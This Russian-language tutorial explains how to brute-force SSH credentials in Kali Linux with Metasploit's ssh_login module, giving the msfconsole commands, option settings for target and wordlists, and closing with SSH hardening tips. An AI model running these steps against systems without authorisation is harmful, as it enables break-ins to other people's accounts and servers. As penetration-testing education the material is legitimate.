Как использовать брутфорс SSH в Kali Linux?
Протокол Secure Shell (SSH) — это криптографический сетевой протокол для безопасной работы сетевых служб в незащищенной сети. Его приложения — это удаленный вход в систему и выполнение из командной строки. Протоколы SSH основаны на архитектуре клиент-сервер, т.е. клиент SSH и сервер SSH.
В этой статье объясняется атака SSH Bruteforce. В этой статье мы будем использовать Kali Linux, потому что Kali в основном используется для расширенного тестирования на проникновение и аудита безопасности.
Прежде всего, для получения доступа к уязвимой машине нам нужен адрес машины или имя машины, то есть адрес ipV4. После этого нам потребуется имя пользователя и соответствующий ему пароль. Для этого сценария мы применяем атаку грубой силы, для имени пользователя и пароля мы создаем два разных текстовых файла: один для возможных имен пользователей и один для возможных паролей.
Для SSH-атак грубой силы в Kali Linux есть много приложений, например:
- Метасплоит
- Гидра
В этой статье мы будем использовать Metasploit.
Шаги для SSH Bruteforce Attack на уязвимой машине:
Шаг 1. Прежде всего, проверьте, правильно ли установлен Metasploit.
Шаг 2. Обновите и обновите Kali Linux:
apt-get update && apt-get upgrade
Шаг 3. Запустите в консоли следующую команду:
msfconsole
Выход :
Шаг 4. Запустите команду:
search ssh
Выход:
Шаг 5. Выберите этот вспомогательный файл ssh, введя следующую команду:
use auxiliary/scanner/ssh/ssh_login
Шаг 6. Чтобы показать параметры, введите следующую команду:
show options
Выход:
Шаг 7 . Установите параметры столько, сколько у вас есть:
Например:
- установить RHOSTS 192.168.XX.XX (адрес уязвимой машины)
- установить PASS_FILE /root/Desktop/passwords.txt (путь к текстовому файлу паролей)
- установить USER_FILE /root/Desktop/usernames.txt (путь к текстовому файлу с именами пользователей)
- установите VERBOSE true (будет показана точно совпадающая комбинация имени пользователя и пароля)
Шаг 8 . Теперь, чтобы получить результат, введите следующую команду.
run
После запуска этой команды потребуется некоторое время, это зависит от размера файла. Поскольку это атака Bruteforce, она займет много времени и зависит от архитектуры вашей машины.
Если машина уязвима для этой атаки, вы получите сеанс ssh.
Предоставляя сеансы команд, он покажет вам запущенные задания и выберет из них.
Предотвращения атак SSH методом грубой силы:
- Не используйте общие имена пользователей и пароли.
- Используйте список разрешений и разрешайте доступ только тем пользователям, которым требуется доступ по SSH.
- Не позволяйте root войти в систему.
- Не слушайте каждый интерфейс.
- Не разрешайте пароли ssh.